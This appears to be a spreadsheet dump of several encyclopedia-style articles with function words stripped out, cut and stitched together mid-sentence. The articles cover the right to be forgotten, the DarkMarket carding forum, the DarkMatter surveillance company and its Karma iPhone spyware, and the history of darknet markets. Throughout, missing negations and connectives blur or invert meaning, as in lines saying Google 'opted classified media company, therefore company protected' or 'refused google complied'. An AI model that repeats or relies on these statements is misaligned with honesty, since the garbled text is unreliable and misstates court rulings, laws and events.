provides protection exemption companies listed "media" companies, like newspapers journalistic work. however, google purposely opted classified "media" company, therefore company protected. judges european union ruled international corporation, google, collector processor data classified "data controller" meaning data protection directive. these "data controllers" required remove data "inadequate, irrelevant, longer relevant", making directive global importance.in article directive 95/46/ec gave legal basis internet protection individuals.: 2012 european commission disclosed draft european data protection regulation supersede directive, included specific protection right forgotten article right forgotten replaced limited right erasure article version gdpr adopted european parliament march 2014 became april 2016. exercise right forgotten request removal search engine, must complete form search engine's website. google's removal request process requires applicant identify country residence, personal information, list urls removed along short description, cases attachment legal identification. applicant receives email google confirming request request must assessed approved removal. request approved, searches using individual's name longer result content appearing search results. content remains online erased. after request filled, removals team reviews request, weighing "the individual's right privacy public's right know", deciding website "inadequate, irrelevant longer relevant, excessive relation purposes processed". google formed advisory council various professors, lawyers, government officials around europe provide guidelines decisions. however, review process still mystery general public. guidelines regulators released november 2014, google began take action much sooner that, (according author) allowed shape interpretation [their] ends". 2015, eighty academics called transparency google open letter.the form asks people select twenty-eight countries make european union, well iceland, liechtenstein, norway, switzerland. "the form allows individual someone representing individual request" removal urls believed violation individual's privacy. regardless submitting form, form photo identification person form submitted must present. this meant serve proof person request made fact approve. google refuses request delink material, europeans appeal local data protection agency. 2015, british data protection agency treated complaints, overturned google's decision quarter those. google fails comply data protection agency decision, face legal action.in july 2014, early stages google's effort comply court ruling, legal experts questioned whether google's widely publicized delistings number news articles violated data protection directive, since implementing directive, google required weigh damage person making request public interest information available. google indeed acknowledged search result removals, affecting articles public interest, incorrect, reinstated links week later. commentators like charles arthur, technology editor guardian, andrew orlowski register noted google required comply removal requests all, refer requests information commissioner relevant country decision weighing respective merits public interest individual rights.google notifies websites urls delinked, various news organizations, bbc, published lists delinked articles. complainants named news commentary regarding delinkings. august 2015 british data protection agency issued enforcement action requiring google delink recent articles searches complainant's name, google refused google complied request. some academics criticized news organizations google behavior.in july 2015, google accidentally revealed data delinkings "shows google privacy requests citizens protect personal private information criminals, politicians public figures."this data leak caused serious social consequences google public expressed outrage fear information recently made public. though requests made criminals, politicians, public figures, content removed sparked fear. particular, request data removal british doctor requesting links removed past botched medical procedures. google agreed remove three search results containing personal information. public voiced outrage stating removing information used manipulation could lead innocent people making uninformed decisions. google responded public outrage saying removing content consider right individual public interest.the european union pushing delinkings requested citizens implemented google european versions google google.co.uk, google.fr, etc.), google.com international subdomains. regulators want delinkings implemented cannot circumvented way. google refused french data protection agency's demand apply right internationally. part refusal comply recommendation privacy regulating board google become subject four-year-long antitrust investigation european commission. september 2015, french data protection agency dismissed google's appeal.the french data protection agency appealed courts seek action google failing delink across global servers. september 2019 court justice issued decision, finding google required delink sites external concluding "currently, obligation law, search engine operator grants request de-referencing made data subject carry de-referencing versions search engine."as september 2015, delinked site www.facebook.com. three google's sites, groups.google.com, plus.google.com www.youtube.com among delinked sites. addition google, yahoo bing also forms making delinking requests. september 2019, european court justice ruled right forgotten apply outside member states. ruling meant google delete names individuals international versions. caselaw spain 2014, european court justice ruled google costeja, case brought spanish man, mario costeja gonzález, requested removal link digitized 1998 article vanguardia newspaper auction foreclosed home, debt subsequently paid. initially attempted article removed complaining spanish agency data protection, rejected claim grounds lawful accurate, accepted complaint google asked google remove results. google sued spanish audiencia nacional (national high court) referred series questions european court justice. court ruled costeja search engines responsible content point thus, google required comply data privacy laws. first compliance (may 2014), google received 12,000 requests personal details removed search engine. caselaw germany october 2009, lawyers wolfgang werlé who—together manfred lauber—was convicted murdering walter sedlmayr sent wikimedia foundation cease desist letter requesting werlé's name removed english language wikipedia article walter sedlmayr, citing 1973 federal constitutional court decision allows suppression criminal's name news accounts released custody. previously, alexander stopp, attorney werlé lauber, default judgment german court, behalf lauber, wikimedia foundation. according electronic frontier foundation, werlé's lawyers also challenged internet service provider austria published names convicted killers.wikimedia based united states, first amendment protects freedom speech freedom press. germany, seeks protect name likenesses private persons unwanted publicity. january 2008, court hamburg supported personality rights werlé, german includes removing name archive coverage case.on november 2009, york times reported wolfgang werlé case pending wikimedia foundation german court. editors german-language wikipedia article sedlmayr removed names murderers, since restored article. guardian observed lawsuit streisand effect, upsurge publicity case resulting legal action.on december 2009, german federal court justice (bundesgerichtshof) karlsruhe ruled german websites check archives order provide permanent protection personality rights convicted criminals. case occurred names brothers found website deutschlandradio, archive article dating july 2000. presiding judge gregor galke stated "this blank check", pointed right rehabilitation offenders taken consideration.on november 2019, german constitutional court karlsruhe ruled german murderer paul termann right forgotten. general data protection regulation 2012 draft european data protection regulation article detailed "right forgotten erasure". under article individuals data appertains granted right "obtain controller erasure personal data relating abstention dissemination data, especially relation personal data made available data subject child data longer necessary purpose collected for, subject withdraws consent, storage period expired, data subject objects processing personal data processing data comply regulation".the defines "data controllers" "people bodies collect manage personal data". general data protection regulation requires data controllers informed individual requested deletion links copies information must "take reasonable steps, including technical measures, relation data publication controller responsible, inform third parties processing data, data subject requests erase links copy replication personal data. where controller authorized third party publication personal data, controller shall considered responsible publication". situation data controller take reasonable steps fined heavily.the european parliament "expected adopt proposals first reading april 2013 plenary session". right forgotten replaced limited right erasure version gdpr adopted european parliament march 2014. article provides data subject right request erasure personal data related number grounds including non-compliance article (lawfulness) includes case legitimate interests controller overridden interests fundamental rights freedoms data subject require protection personal data (see also costeja).the european union highly influential group states, movement towards right forgotten step towards global recognition right. support this, 2012 obama administration released "privacy bill rights" protect consumers online, quite strength law, step towards recognition right forgotten. india april 2016, delhi high court began examine issue delhi banker requested personal details removed search results following marital dispute. case, dispute settled, banker's request valid. high court asked reply google search engine companies september upon court continue investigate issue.in january 2017 karnataka high court upheld right forgotten, case involving woman originally went court order marriage certificate annulled, claiming never married certificate. after parties came agreement, woman's father wanted name removed search engines regarding criminal cases high court. karnataka high court approved father's request, stating right forgotten. according court, ruling would align western countries' decisions, typically approve right forgotten dealing cases "involving women general highly sensitive cases involving rape affecting modesty reputation person concerned." woman specific case worried search results would affect standing husband, well reputation society.as february 2017, delhi high court hearing case involving requesting information regarding mother wife removed search engine. believes name linked search hindering employment options. delhi high court still working case, along issue whether right forgotten legal standard india. currently, legal standard right forgotten, implemented, would mean citizens longer need file case order request information search engines removed. this case could significant impacts right forgotten search engines india. south korea 2016, south korea's communications commission (kcc) announced citizens able request search engines website administrators restrict postings publicly accessible. released "guidelines right request access restrictions personal internet postings", took effect june 2016 apply third party contents. extent right forgotten concerns data subject's right limit searchability third party postings him/her, guideline constitute right forgotten. also, right withdraw one's posting, critics noted people able delete postings guideline long retained login credentials, people misplaced login credentials permitted retrieve receive ones. services significantly affected guideline wiki-type services people's contributions make logical sense response conjunction another's contributions therefore postings made permanent part mass-created content, made sure guideline applies services posting identifies authors.the guidelines created include data subjects remove content includes links, evidence consisting personal information. commission included different amendments guideline. this includes describing guidelines "minimum" "preliminary" precaution regarding privacy rights vague areas existing laws. guideline encompasses foreign internet companies provide translation services south korean consumers. order person's information "forgotten" three step process: issue posted url, proof ownership post, grounds request. there restrictions step. when posting url, operator right preserve posting issue. second post relevant public interest, operators process request terms relevance. united states consideration right forgotten seen case law, specifically melvin reid, sidis publishing corp.in melvin reid (1931), ex-prostitute charged murder acquitted; subsequently tried assume quiet anonymous place society. however, 1925 film kimono revealed history, successfully sued producer. court reasoned "any person living life rectitude right happiness includes freedom unnecessary attacks character, social standing reputation."in sidis publishing corp. (1940), plaintiff, william james sidis, former child prodigy wished spend adult life quietly, without recognition; however, disrupted article yorker. court held limits right control one's life facts oneself, held social value published facts, person cannot ignore celebrity status merely want to.there opposition recognition right forgotten united states commentators argue contravene right freedom speech freedom expression, constitute censorship, thus potentially breaching peoples' constitutionally protected right freedom expression united states constitution. these criticisms consistent proposal information removed user's request content uploaded.in june 2014 opinion piece forbes, columnist joseph steinberg noted "many privacy protections americans believe enjoy even guaranteed have, fact, eroded even obliterated technological advances." steinberg, explaining need legislation guaranteeing "right forgotten", noted existing laws require adverse information removed credit reports period time, allowing sealing expunging criminals records effectively undermined ability prospective lenders employers forever find removed information matter seconds search.on march 2015, intelligence squared organization stages oxford-style debates, held event centered question, "should u.s. adopt 'right forgotten' online?" side motion majority voting audience.while opinions among experts divided u.s., survey indicated americans want form right forgotten. consumer rights organization consumer watchdog filed complaint federal trade commission americans obtain right well.in march 2017, york state senator tony avella assemblyman david weprin introduced bill proposing individuals allowed require search engines online speakers remove information "inaccurate", "irrelevant", "inadequate", "excessive", longer material current public debate discourse" causing demonstrable harm subject. private entities january 2021, boston globe announced program allow subjects relatively inconsequential stories stories contextualized, removed google searches anonymized. connection international relations regulatory differences protection personal data countries real impact international relations. right forgotten, specifically, matter eu-us relations applied cross-border data flow, raises questions territorial sovereignty. structure westphalian international system assumes reach country's jurisdiction limited geographic territory. however, online interactions independent geographic location present across multiple locations, rendering traditional concept territorial sovereignty moot. therefore, united states forced confront regulatory differences negotiate regulations apply foreign companies processing handling data european citizens residents.the regulatory differences right forgotten along numerous data protection rights shaped discussions negotiations trans-atlantic data privacy regulations. case point united states' endeavors develop safe harbor agreement, data transfer pact enables transfer data companies manner consistent eu's data protection schemes. article data protection directive articulates cross-border transfer data take place "third country question ensures adequate level protection," meaning country meets eu's minimum standards data protection. standards include, among many provisions, component protects right "opt out" processing transmission personal data, assumption data processed ways inconsistent intent collected.given inconsistencies united states numerous digital privacy regulations, including right forgotten, article poses threat trans-atlantic data flows. therefore, united states entered negotiations mediate differences safe harbor agreement, result debate discussion parties, requires companies provide individuals choice opportunity "opt out" afford protections.under pressures mass surveillance carried government european citizens' data, safe harbor agreement invalidated european union court justice schrems case. safe harbor agreement replaced privacy shield principles. response criticism response reputation management firms businesses manage clients' online reputations responded european court ruling exercising right forgotten means remove unfavorable information. technique used reputation consulting firms submit multiple requests link, written different angles attempt links removed. google, example, limit number requests submitted removal given link. criticism major criticisms stem idea right forgotten would restrict right freedom speech. many nations, united states particular (with first amendment united states constitution), strong domestic freedom speech laws, would challenging reconcile right forgotten. some academics limited form right forgotten would reconcilable constitutional law; right individual delete data personally submitted. limited form right individuals could material removed uploaded others, demanding removal information could constitute censorship reduction freedom expression many countries. sandra coliver open society justice initiative argues rights must compatible conflict rights detrimental survival either.the draft general data protection regulation written broadly caused concern. attracted criticism enactment would require data controlling companies great lengths identify third parties information remove proposed regulation also attracted criticism fact could produce censoring effect companies, facebook google, wish fined act, therefore likely delete wholesale information rather facing fine, could produce "serious chilling effect." addition this, concerns requirement take information others posted individual; definition personal data article 4(2) includes "any information relating individual. this, critics claimed, would require companies take information relating individual, regardless source, would amount censorship, result data companies eradicating data comply this. such removal impact accuracy ability businesses individuals carry business intelligence, particularly diligence comply anti bribery, anticorruption, know customer laws. right forgotten invoked remove google searches reports company directors published dato capital, spanish company compiles reports private company directors, consisting entirely information required disclose; fortune magazine examined reports relating directorships, finding (42%) director person named, remaining director co-directors named, (36%) involve directorships started since 2012.other criticism revolves around principle accountability.there concerns proposed general data protection regulation would result google internet search engines producing neutral search results, rather producing biased patchy results, compromising integrity internet-based information. balance criticism, proposed general data protection regulation included exception "for processing personal data carried solely journalistic purposes purpose artistic literary expression order reconcile right protection personal data rules governing freedom expression." article upheld freedom speech, lessening obligations data providers social media sites, nevertheless wide meaning "journalistic purposes" allows autonomy reduces amount information necessary removed.: when google agreed implement ruling, european commission vice-president viviane reding said, "the court also made clear journalistic work must touched; protected." however, google criticized taking (under costeja precedent) news blog post stan o'neal economics editor robert peston (eventually, peston reported blog post remained findable google all). despite criticisms google's action, company's ceo, larry page worries ruling "used governments forward progressive europe things", though since distanced position. example, pianist dejan lazic cited "right forgotten" trying remove negative review performance washington post. claimed critique "defamatory, mean-spirited, opinionated, offensive simply irrelevant arts". lawrence parish roman catholic church kutno, poland asked google remove polish wikipedia page polish) without allegations mentioned therein date. index censorship claimed costeja ruling "allows individuals complain search engines information like legal oversight. this akin marching library forcing pulp books. although ruling intended private individuals opens door anyone wants whitewash personal history… court's decision retrograde move misunderstands role responsibility search engines wider internet. send chills spine everyone european union believes crucial importance free expression freedom information."in 2014, gerry hutch page english wikipedia among first wikipedia pages removed several search engines' query results european union. daily telegraph said, 2014, wikipedia co-founder jimmy wales "described eu's right forgotten deeply immoral, organisation operates online encyclopedia warned ruling result internet riddled memory holes". other commentators disagreed wales, pointing problems google including links revenge porn sites search results, accused google orchestrating publicity campaign escape burdensome obligation comply law. julia powles, technology researcher university cambridge, made rebuttal wales' wikimedia foundation concerns editorial published guardian, opining "there public sphere memory truth, private one...without freedom private, precious little freedom all."in response criticism, released factsheet address considers myths right forgotten. addition this, clarification law, factsheet provides information pivotal court case c-131/12 frequently asked questions regarding google, purpose law, works.other criticisms involving right forgotten revolves around policies data removal regarding minors. u.s. laws place protect privacy minors. california minor eraser allows california residents request information removed posted online server. "applies websites, social media sites, mobile apps online services" follows "europe's recognition 'right forgotten'". this effect january 2015 remains existence today. online "service" operators services "directed toward minors" must update privacy policies include option remove data requested minor posted service. 2017 conservative manifesto included pledge allow social media platform users remove outdated information posted tory victory june lead youthful indiscretions facebook twitter open erasure. also plans fine social media firms moving speed political opportunism extreme content." united kingdom fully adopted ruling european court justice regarding right forgotten argued keep going law. however, upcoming elections laws could passed allow minors remove embarrassing posts photos social media could come back affect applications public image later life. theresa may, prime minister pushed extend privacy rights minors allowing right delete information. intentions extension privacy based fact social media sites store years data affect minors lives' much later information posted. gave stance privacy said, "'the internet brought wealth opportunity also significant risks evolved faster society's response them'". conservative party, headed 2016 2019, pushed policies aggressively remove illegal material internet fine firms take action removing said material.in 2015, commission nationale l'informatique libertés (cnil) asked google remove data versions available part world. google entities argued european data regulators allowed decide internet users around world find search engine. research security researchers cispa, saarland university university auckland proposed framework, called oblivion, support automation right forgotten scalable, provable privacy-preserving manner. oblivion program helps "automate" process attempting verify someone's personal information could found google search result." google gets many take-down requests short amount time, oblivion might help problem. researchers authors behind oblivion essential develop techniques least partly automate process scalable internet size." oblivion helps humans review forms google ensure antagonistic users cannot "blacklist links internet sources affect them." example, tests proven oblivion handles requests rate second. software allows google, government, user work together content removed quickly cause. order ensure program works quickly, secure users impervious fake take-down requests, oblivion uses three-part system. first part, oblivion requires user submit identification limited "name, age, nationality." oblivion enables user automatically find disseminated personal information using natural language processing image recognition techniques file request privacy-preserving manner. oblivion scan article attributes match information submitted user. second, oblivion provides indexing systems automated provable eligibility mechanism, asserting author request indeed affected online resource. author request issued "ownership token" confirms articles submitted evaluation include sensitive personal information. automated eligibility proof ensures censorship-resistance leg</t>
  </si>
  <si>
    <t>DarkMarket</t>
  </si>
  <si>
    <t>darkmarket english-speaking internet cybercrime forum created renukanth subramaniam london shut 2008 agent keith mularski infiltrated using alias master splyntr, leading arrests worldwide. subramaniam, used alias jilsi, admitted conspiracy defraud sentenced nearly five years prison february 2010.darkmarket also refers darknet market founded 2019 name. however, german prosecutors cities koblenz oldenburg said january 2021 shut "probably largest illegal marketplace darknet" called darkmarket physically arrested believed operate near germany's border denmark.the website allowed buyers sellers stolen identities credit card data meet conduct criminal enterprise entrepreneurial, peer-reviewed environment. 2,500 users peak.according supervisory special agent mularski fbi's cyber initiative resource fusion unit, undercover operation "very successful getting upper echelons dark market group actually able server host communications going make cases." obtained full access everyone using site securing server gaining subramaniam's confidence. congressional testimony november 2009, deputy assistant director, cyber division steven chabinsky described operation: fbi's infiltration dismantlement darkmarket, online virtual transnational criminal organization. working international partners united kingdom, germany, turkey, conducted two-year undercover operation penetrate organization bring knees. peak, darkmarket forum 2,500 members—spanning countries throughout world—who involved buying selling stolen financial information, including credit card data, login credentials (user names, passwords), equipment used carry certain financial crimes. using undercover techniques, penetrated highest levels group identified located leading members. multi-agency multi-national coordination enforcement partners arrests worldwide, well prevention million economic loss otherwise would occurred compromised victim accounts. speech govsec/fose conference march 2010, chabinsky related explained long ago, online carding forum named darkmarket. members worldwide involved buying selling stolen financial information, credit card data, login credentials, equipment carry financial crimes. darkmarket exist anymore. why? because infiltrated brought down. through two-year undercover operation individual known users "master splyntr," penetrated highest levels group identified located leading members, arrests worldwide prevention tens hundreds millions dollars economic loss. shock criminals worldwide, master splyntr—who site nearly everyday, participating anywhere hour hours day—was dedicated talented special agent, proud fortunate many. still, work take single forum, shows succeed right people place resources apply. words, hired trained special agents talk talk, given resources spend enough hours online extended period time, found almost cyber criminal enterprise begin trust despite never face-to-face. also learned communication methods used criminals are, them, social outlet well. just often speaking malware, crimes, goods sale, talking families, girlfriends, vacations, cars. after time, members forums become friends. that intrinsic trust stems from. when somebody first enters member, they’re considered potential cop; month later, they’re less cop; months later, they’re friend; year later, trusted implicitly—to extent outsider anonymously told darkmarket participant master splyntr actually (which, know, true) master splyntr deny accusation believed insider, whereas informer outsider. darkmarket case also provides insight cyber crime tradecraft. cyber criminals deploy countermeasures cost time effort, hopes evading lawful investigative techniques. consider fact cyber criminals routinely change nicknames, e-mails, digital currency accounts, numbers forums. change accounts identifying numbers, also different combinations information forum participate another darkmarket member, thomas james frederick smith, pleaded guilty june 2010, conspiracy intentionally cause damage protected computer commit computer fraud. references further reading glenny, misha, darkmarket cyberthieves, cybercops, you, york, alfred knopf, 2011. isbn 978-0-307-59293-4</t>
  </si>
  <si>
    <t>DarkMatter (company)</t>
  </si>
  <si>
    <t>darkmatter group, founded united arab emirates (uae) 2014 2015, cybersecurity company. company describes purely defensive company, several whistleblowers alleged involved offensive cybersecurity ('cracking' 'hacking'), including behalf emirati government. company history darkmatter founded either 2014 2015 faisal al-bannai, founder mobile phone vendor axiom telecom major general dubai police force. around 2014, zeline wholly owned subsidiary darkmatter, became active finland.darkmatter's public launch came 2015, annual arab future cities summit. time, company advertised capabilities including network security sweeping, promised create new, "secure" mobile phone handset. promoted "digital defense intelligence service" uae.in 2016, darkmatter replaced cyberpoint contractor project raven. also 2016, darkmatter sought smartphone development expertise oulu, finland. darkmatter recruited several finnish engineers.by early 2018, darkmatter's turnover hundreds millions u.s. dollars. eighty cent work government related organizations, including nesa. developed smartphone model called katim, arabic "silence". darkmatter official provider expo 2020, since dropped favour different company. 2021,darkmatter’s cyber activities already transferred digital14 distributes secure communications system ‘katim’. recruitment practices addition recruiting conventional routes personal referrals stalls trade shows (e.g. black hat), darkmatter headhunts staff u.s. national security agency "poached" competitors' staff contracted government, happened cyberpoint employees.the company reportedly hired graduates israel defense force technology units paying million annually.simone maragitelli, italian security researcher, blogged darkmatter's vague dubious recruiting practices warning others. claimed questions objections company's practices would result told "things blown proportion" information opening extremely vague despite asking questions. allegations surveillance government response alleged cyber spying opponents iran's best interests government iran 2010 2011, united states assisted united arab emirates late 2011 establishing national electronic security authority (nesa) uae's equivalent nsa. project raven project raven confidential initiative help surveil governments, militants, human rights activists. team included former u.s. intelligence agents, applied training hack phones computers belonging project raven's victims. operation based converted mansion suburb dhabi khalifa city nicknamed "the villa."from around 2014 2016, cyberpoint supplied u.s.-trained contractors project raven. 2016, news reports emerged cyberpoint contracted italian spyware company hacking team, damaged cyberpoint's reputation defensive cybersecurity firm. reportedly dissatisfied relying upon u.s.-based contractor, replaced cyberpoint darkmatter contractor, darkmatter induced several cyberpoint staff move darkmatter. after this, project raven reportedly expanded surveillance include targeting americans, potentially implicating american staff unlawful behaviour.following october 2016 intercept article revealing darkmatter surveillance uae, samer khalife, chief financial officer darkmatter, transferred united states citizens darkmatter company connection systems tiger teams established darkmatter counter allegations contained intercept article.on february 2019, technica published comments darkmatter's former employee, daniel wolford. stated, hack americans...our mission simple: advise assist create national cyber security program similar ntoc (nsa/css threat operations center)." work done creating "target list," wolford said, part training operation teach emiratis lawful targeting collection," asserted. tried show isn’t threat national security."on december 2021, loujain al-hathloul filed lawsuit district court oregon three former intelligence military officers, carried hacking operations behalf uae. according lawsuit, three marc baier, ryan adams, daniel gericke worked darkmatter assisted emirati security officials exfiltrate data iphone. hacking al-hathloul’s arrest rendition saudi arabia, detained, imprisoned tortured.on december 2021, popular messaging named "totok" deemed secret tool developed uae. very little known tool capabilities are.in december 2021, u.s. lawmakers urged treasury state departments sanction darkmatter, group, nexa technologies trovicor. letter signed senate finance committee chairman wyden, house intelligence committee chairman adam schiff lawmakers, asked global magnitsky sanctions, companies accused enabling human rights abuses. letter demanded high-ranking executives darkmatter, along three firms, sanctioned. karma spyware 2016, project raven bought tool called karma. karma able remotely exploit apple iphones anywhere world, without requiring interaction part iphone's owner long username provided, apple email address associated phone, phone number. apparently achieved exploiting zero-day vulnerability device's imessage app. project raven operatives able view passwords, emails, text messages, photos location data compromised iphones.people whose mobile phones deliberately compromised using karma reportedly include: emir qatar, sheikh tamim hamad thani nicknamed "crybaby", hamad khalifa thani nicknamed "angryfather", plus brother several close associates. nadia mansoor, wife imprisoned human rights activist ahmed mansoor. (nadia nicknamed "purple egret" project raven; ahmed nicknamed "egret".) british journalist rori donaghy. (donaghy nicknamed "gyro" project raven.) prime minister lebanon saad hariri (uae associated supporting hezbollah.) hundreds targets europe middle east, including governments qatar, yemen, kuwait, oman, serbia, lebanon, iran turkey.around mid-2017, apple patched security vulnerabilities exploited karma, unknowingly reducing tool's effectiveness. certificate authority controversy 2016, darkmatter whistleblowers multiple security researchers expressed concerns darkmatter intended become certificate authority (ca). this would give technical capability create fraudulent certificates, would allow fraudulent websites software updates convincingly masquerade legitimate ones. such capabilities, misused, would allow darkmatter easily deploy rootkits targets' devices, decrypt https communications firefox users man-in-the-middle attacks.on december 2017, darkmatter requested mozilla include trusted firefox browser. year, mozilla's reviewers addressed concerns darkmatter's technical practices, eventually questioning basis whether darkmatter baseline requirements inclusion.on january 2019, reuters published investigations describing darkmatter's project raven. mozilla's reviewers noted investigation's findings. subsequently, electronic frontier foundation (eff) others asked mozilla deny darkmatter's request, basis investigation showed darkmatter untrustworthy therefore liable misuse capabilities. march 2019, mozilla's public consultation deliberations ongoing.in july 2019, mozilla prohibited government united arab emirates operating internet security gatekeepers, following reports cyber-espionage program, dhabi-based darkmatter staff leading clandestine hacking operation.in august 2019, google blocked websites approved darkmatter, reuters reported firm's involvement hacking operation united arab emirates. google, previously, said websites certified darkmatter would marked unsafe chrome android browsers. investigation indictments darkmatter investigation crimes including digital espionage services, involvement jamal khashoggi assassination, incarceration foreign dissidents.on september 2021, marc baier ryan adams daniel gericke indicted violations united states laws involving computer fraud improper exporting technology, agreed deferred prosecution agreement would fine three years $750,000, $600,000, $335,000, respectively, total $1.68 million, support justice department investigations, sever ties united arab emirates intelligence enforcement agencies, prohibition services, including defense articles, associated itar future computer network exploitation employment, immediately relinquish security clearances united states foreign entity lifetime future security clearances united states. after contracts shifted parent firm cyberpoint subsidiary darkmatter, baier, former employee nsa, adams gericke, united states military intelligence community, failed receive permission employed firm. according lori stroud former employee, trio worked united states-based cyberpoint subsidiary darkmatter 2018 faisal al-bannai confirmed darkmatter works closely government competitor israeli firm group. from january 2016 november 2019, trio marc baier, ryan adams daniel gericke significantly improved operations darkmatter provided government uae. darkmatter interested hacking qatar's computers obtaining reading electronic messages, believed qatar supporting potential terrorist organization named muslim brotherhood. example, darkmatter hacked electronic communication first lady michelle obama former qatari minister regarding michelle obama conan o’brien's november 2015 trip qatar obama o'brien visited al-udeid airbase hosts forward base headquarters united states central command, raf's expeditionary group, headquarters united states forces central command wars iraq afghanistan. united states january 2020 investigations darkmatter employees' conduct, united states congress passed proposed 2019 congressperson rose york. requires united states intelligence agencies annually assess risk united states national security posed former intelligence officials employees working foreign based firms, governments, entities. this driven part united arab emirates cyber espionage operations united states citizens, firms, entities, government. also group stealth falcon george nader elliott broidy notes references external links official website</t>
  </si>
  <si>
    <t>Darknet market</t>
  </si>
  <si>
    <t>darknet market commercial website dark operates darknets i2p. they function primarily black markets, selling brokering transactions involving drugs, cyber-arms, weapons, counterfeit currency, stolen credit card details, forged documents, unlicensed pharmaceuticals, steroids, illicit goods well sale legal products. december 2014, study gareth owen university portsmouth suggested second popular sites darknet markets.following model developed silk road, contemporary markets characterized darknet anonymized access (typically tor), bitcoin monero payment escrow services, ebay-like vendor feedback systems. history 1970s 2011 though e-commerce dark started around 2006, illicit goods among first items transacted using internet, early 1970s students stanford university massachusetts institute technology used arpanet coordinate purchase cannabis. 1980s, newsgroups like alt.drugs would become online centres drug discussion information; however, related deals arranged entirely off-site directly individuals. with development popularization world wide e-commerce 1990s, tools discuss conduct illicit transactions became widely available. better-known web-based drug forums, hive, launched 1997, serving information sharing forum practical drug synthesis legal discussion. hive featured dateline special called files 2001, bringing subject public discourse. from 2003, "research chemical mailing list" (rcml) would discuss sourcing "research chemicals" legal grey sources alternative forums alt.drugs.psychedelics. however operation tryp series website shut downs arrests area.since year 2000, emerging cyber-arms industry operates online, including eastern european "cyber-arms bazaar", trafficking powerful crimeware hacking tools. 2000s, early cybercrime carding forums shadowcrew experimented drug wholesaling limited scale.the farmer's market launched 2006 moved onto 2010. 2012, closed several operators users arrested result operation adam bomb, two-year investigation u.s. drug enforcement administration. considered "proto-silk road" payment services paypal western union allowed enforcement trace payments subsequently shut 2012. silk road early markets first marketplace bitcoin escrow silk road, founded ross ulbricht pseudonym "dread pirate roberts" february 2011. june 2011, gawker published article site, "internet buzz" increase website traffic. this turn political pressure senator chuck schumer department justice shut down, finally october 2013 lengthy investigation. silk road's tor, bitcoin escrow feedback systems would standard darknet markets coming years. shutdown described news site deepdotweb "the best advertising dark markets could hoped for" following proliferation competing sites caused, guardian predicted others would take market silk road previously dominated.the months years silk road's closure marked greatly increased number shorter-lived markets well semi-regular enforcement take downs, hacks, scams voluntary closures. atlantis, first site accept litecoin well bitcoin, closed september 2013, prior silk road raid, leaving users week withdraw coins. october 2013, project black flag closed stole users' bitcoins panic shortly silk road's shut down. black market reloaded's popularity increased dramatically closure silk road sheep marketplace; however, late november 2013, owner black market reloaded announced website would taken offline unmanageable influx customers caused. sheep marketplace, launched march 2013, lesser known sites gain popularity silk road's closure. long events, december 2013, ceased operation florida stole million worth users' bitcoins. since silk road from late 2013 2014, markets started launching regularity, silk road 2.0, former silk road site administrators, well agora marketplace. such launches always success; february 2014 utopia, highly anticipated market based black market reloaded, opened shut days later following rapid actions dutch enforcement. february 2014 also marked short lifespans black goblin market cannabisroad, sites closed demonized without much effort.november 2014 briefly shook darknet market ecosystem, operation onymous, executed united states' uk's national crime agency, seizure hidden sites, including silk road 2.0, largest markets time, well smaller markets individual vendor sites. september 2014, agora reported largest market, avoiding operation onymous, april 2015 gone largest overall marketplace listings silk road height.2015 would feature market diversification developments around escrow decentralization. march 2015, evolution marketplace performed "exit scam", stealing escrowed bitcoins worth million, half ecosystem's listing market share time. closure evolution users redistributing black bank agora. however black bank, april 2015 captured darknet market's listings, announced 2015, closure "maintenance" disappearing similar scam. following events commentators suggested market decentralization could required, service openbazaar, order protect buyers vendors risk future well widespread support "multi-sig" cryptocurrency payments.in april, therealdeal, first open cyber-arms market software exploits well drugs, launched interest computer security experts. may, varied ddos attacks performed different markets including therealdeal. market owners phishing website attacker's password, subsequently revealed collaboration attacker administrator nice guy's market also planning scam users. this information revealed news site deepdotweb.on july italian police conjunction europol shut italian language babylon darknet market seizing 11,254 bitcoin wallet addresses million euros.at august, leading marketplace agora announced imminent temporary closure reporting suspicious activity server, suspecting kind deanonymization tor.by october 2015, alphabay recognized largest market. from 2016 period extended stability markets, april large nucleus marketplace collapsed unknown reasons, taking escrowed coins it.on april investigations italian darknet community (idc) forum-based marketplace number arrests.in 2017, bloomsfield market closed investigations slovakia inadvertently arrests operators. later month, long-lived outlaw market closed citing major bitcoin cryptocurrency wallet theft; however, speculation remained exit scam.in july 2017, markets experienced largest disruptions since operations onymous, operation bayonet culminated coordinated multinational seizures hansa leading alphabay markets, sparking worldwide enforcement investigations. seizures brought lots traffic markets making traderoute dream market popular markets time. october 2017, traderoute exit-scammed shortly hacked extorted.in june 2018, digital security organization digital shadows reported that, climate fear mistrust closure alphabay hansa, darknet market activity switching away centralized marketplace websites towards alternatives direct chat telegram, decentralized marketplaces like openbazaar.in 2019 dream market popular market far, 120,000 current trade listings, followed time wall street market 10,000 listings. dream market shut 2019, wall street market seized enforcement 2019.the 2019 seizure news links site deepdotweb conspiring markets created temporary disruption around market navigation.in 2021, authorities taken largest dark marketplace darkmarket, along arresting australian believed operator website. servers hosted website seized.in august 2021, alphabay relaunched return original security administrators desnake. market features search discussion central discussion forums reddit's /r/darknetmarkets/, subject legal investigation, well tor-based discussion forum, hub. march 2018, reddit administrators shut popular subreddit /r/darknetmarkets citing changes content policy forbids sale "drugs, including alcohol tobacco, controlled substances". this rise dread, dedicated darknet discussion forum news site darknetlive.many market places maintain dedicated discussion forums subreddits. majority marketplaces english, opening chinese, russian, ukrainian.the dedicated market search engine grams allowed searching multiple markets directly without login registration.dark news review sites former deepdotweb, things vice provide exclusive interviews commentary dynamic markets. uptime comparison services provide sources information active markets well suspected scams enforcement activity. decentralized nature markets, phishing scam sites often maliciously accidentally referenced.after discovering location market, user must register site, sometimes referral link, browse listings. required perform transactions, better protecting users login credential compromise. customer interactions transactions typically bitcoin payment, sometimes combined tumblers added anonymity secure communications buyers vendors stored site itself. many sites bitcoin multisig transactions improve security reduce dependency site's escrow. discontinued helix bitcoin tumbler offered direct anonymized marketplace payment integrations.on making purchase, buyer must transfer cryptocurrency site's escrow, vendor dispatches goods claims payment site. receipt non-receipt item users leave feedback vendor's account. buyers "finalize early" (fe), releasing funds escrow vendor prior receiving goods order expedite transaction, leave vulnerable fraud choose so.following operation onymous, substantial increase support vendors, marketplaces near 90%. this suggests enforcement responses cryptomarkets result continued security innovations, thereby making markets resilient undercover enforcement efforts. market types items typical centralized darknet market listed range vendors ebay-like marketplace format. virtually markets advanced reputation, search shipping features similar amazon.com.by 2015 popular vendors dedicated online shops separate large marketplaces. individual sites returned operating clearnet, mixed success.some criminal internet forums defunct carding forum russian anonymous marketplace function markets trusted members providing escrow services, users engaging off-forum messaging. 2014 "deepify" 